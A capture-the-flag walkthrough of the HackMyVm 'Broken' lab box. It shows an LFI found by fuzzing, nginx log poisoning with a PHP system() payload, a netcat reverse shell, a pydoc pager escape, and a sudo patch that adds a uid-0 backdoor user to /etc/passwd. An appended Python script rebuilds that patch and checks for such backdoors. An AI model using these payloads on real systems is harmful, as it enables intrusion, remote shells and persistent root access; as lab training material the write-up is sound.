HackMyVm Broken Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Broken
Scan ports.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 1b:8d:f3:e3:56:64:af:54:df:10:f8:39:ac:ad:c9:2f (RSA)
| 256 77:c1:f3:e4:6b:96:0f:1e:5c:24:2e:4d:3e:4a:09:80 (ECDSA)
|_ 256 88:05:ef:7a:04:56:f0:59:62:a5:f8:40:32:24:8a:17 (ED25519)
80/tcp open http nginx 1.14.2
| http-robots.txt: 1 disallowed entry
|_/textpattern
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
Scan port 80.
gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
...
/index.html (Status: 200) [Size: 3]
/file.php (Status: 200) [Size: 0]
/robots.txt (Status: 200) [Size: 23]
robots.txt tells us there is a Textpattern CMS under /textpattern.
cat robots.txt
Disallow: /textpattern
file.php returns an empty body with no parameters, so fuzz parameter names for LFI (--hh 0 hides the empty responses).
wfuzz -u 'http://broken/file.php?FUZZ=../../../../../etc/passwd' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000007535: 200 27 L 40 W 1451 Ch "file"
Check passwd.
curl 'http://broken/file.php?file=../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
heart:x:1000:1000:heart,,,:/home/heart:/bin/bash
...
Poison the nginx access log by sending PHP code in the User-Agent header. nginx writes double quotes and backslashes into the log as \x22 and \x5C escapes, so the payload uses the unquoted $_GET[c] form.
curl 'http://broken' -A '<?php system($_GET[c]); ?>'
:(
Include the poisoned log through the LFI and check that the code runs.
curl 'http://broken/file.php?file=../../../../var/log/nginx/access.log&c=id'
...
192.168.56.150 - - [26/May/2021:22:44:55 -0400] "GET / HTTP/1.1" 200 3 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data)
Use the same path to spawn a reverse shell.
curl 'http://broken/file.php?file=../../../../var/log/nginx/access.log&c=nc%20192.168.56.150%201234%20-e%20/bin/bash'
In another terminal, listen to port and get shell.
nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:50004.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Check sudo.
www-data@broken:~/html/textpattern/textpattern$ sudo -l
Matching Defaults entries for www-data on broken:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on broken:
(heart) NOPASSWD: /usr/bin/pydoc3.7
pydoc3.7 pipes its output through a pager (less), and the pager allows shell escapes, so run it as heart and break out to a shell.
www-data@broken:/home/heart$ sudo -u heart /usr/bin/pydoc3.7 os
...
:!/bin/sh
...
$ id
uid=1000(heart) gid=1000(heart) groups=1000(heart),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
$ pwd
/home/heart
$
Check sudo again.
heart@broken:~$ sudo -l
Matching Defaults entries for heart on broken:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User heart may run the following commands on broken:
(ALL) NOPASSWD: /usr/bin/patch
sudo lets heart run patch as root with any patch file, so patch /etc/passwd to add a new uid-0 user root2 with a password hash we chose. Putting the hash directly in /etc/passwd bypasses /etc/shadow.
heart@broken:~$ cp /etc/passwd ./passwd_new
heart@broken:~$ openssl passwd mypass
qQdUCJYw6ARL6
heart@broken:~$ echo 'root2:qQdUCJYw6ARL6:0:0:root:/root:/bin/bash' >> passwd_new
heart@broken:~$ diff -u /etc/passwd ./passwd_new > passwd_patch
heart@broken:~$ sudo patch -i ./passwd_patch /etc/passwd
patching file /etc/passwd
heart@broken:~$ su root2
Password:
root@broken:/home/heart# id;hostname
uid=0(root) gid=0(root) groups=0(root)
broken
root@broken:/home/heart#
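The patch step above, rebuilt as code, together with the defender-side check for what it leaves behind. This is an added example, not from the walkthrough; it generates the same unified diff with difflib (hash generation is left to `openssl passwd`, the hash below is the page's), and `suspicious_entries` flags uid-0 accounts other than root and entries whose password field is not the shadow placeholder `x`, assuming a shadow-enabled system. PASSWD is a constructed two-line stand-in for /etc/passwd.

```python
import difflib

# Constructed two-line stand-in for /etc/passwd (the real file has more entries).
PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "heart:x:1000:1000:heart,,,:/home/heart:/bin/bash\n"
)
PW_HASH = "qQdUCJYw6ARL6"   # `openssl passwd mypass` from the walkthrough


def backdoor_line(user, pw_hash):
    """passwd entry with uid/gid 0: the name is cosmetic, the numbers make it root.
    A hash in field 2 is used directly, so /etc/shadow is never consulted."""
    return f"{user}:{pw_hash}:0:0:root:/root:/bin/bash\n"


def make_patch(passwd_text, user, pw_hash):
    """Unified diff equivalent to `diff -u /etc/passwd passwd_new` above.
    patch(1) takes the target from the --- header when none is given on the
    command line, so the fromfile name is not just decoration."""
    old = passwd_text.splitlines(keepends=True)
    new = old + [backdoor_line(user, pw_hash)]
    return "".join(difflib.unified_diff(old, new,
                                        fromfile="/etc/passwd",
                                        tofile="passwd_new"))


def suspicious_entries(passwd_text):
    """Defender-side check (assumes a shadow-enabled system): return the names
    of uid-0 accounts other than root, of entries carrying a hash instead of
    'x', and of malformed lines."""
    bad = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            bad.append(fields[0])
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if (uid == "0" and name != "root") or pw != "x":
            bad.append(name)
    return bad


if __name__ == "__main__":
    print(make_patch(PASSWD, "root2", PW_HASH), end="")
    print(suspicious_entries(PASSWD + backdoor_line("root2", PW_HASH)))
```

The same uid-0 check is worth running after any box where `patch`, `vim`, `tee` or another file-writing binary was allowed through sudo, since the backdoor survives a reboot and a password change on the real root account.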